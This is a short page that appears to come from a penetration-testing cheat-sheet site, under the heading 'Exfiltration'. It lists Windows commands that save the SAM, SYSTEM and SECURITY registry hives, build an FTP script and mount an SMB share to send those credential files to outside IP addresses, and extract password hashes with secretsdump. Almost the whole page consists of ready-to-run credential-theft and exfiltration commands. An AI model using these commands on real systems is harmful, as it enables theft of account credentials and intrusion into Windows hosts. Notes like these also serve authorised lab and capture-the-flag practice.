Exfiltration

Dump the SAM hive to the pwd

reg.exe save HKLM\SAM sam.bak

Dump the System hive to the pwd

reg.exe save HKLM\SYSTEM system.bak

Dump the Security hive to the pwd

reg.exe save HKLM\SECURITY security.bak

Spin up an smb server

impacket-smbserver share share/ -smb2support -username user -password password1

echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\Users\Administrator\Desktop\sam.bak >> ftp.txt && echo put C:\Users\Administrator\Desktop\system.bak >> ftp.txt && echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

Exfiltrate data

net use \\10.50.102.164\share /USER:adot8\user password1
move sam.bak \\10.50.102.164\share\sam.bak
move system.bak \\10.50.102.164\share\system.bak

Dump hashes with secretsdump

secretsdump.py -sam sam.bak -system system.bak local

PreviousCompiling Code NextPivoting

Last updated 1 year ago

Was this helpful?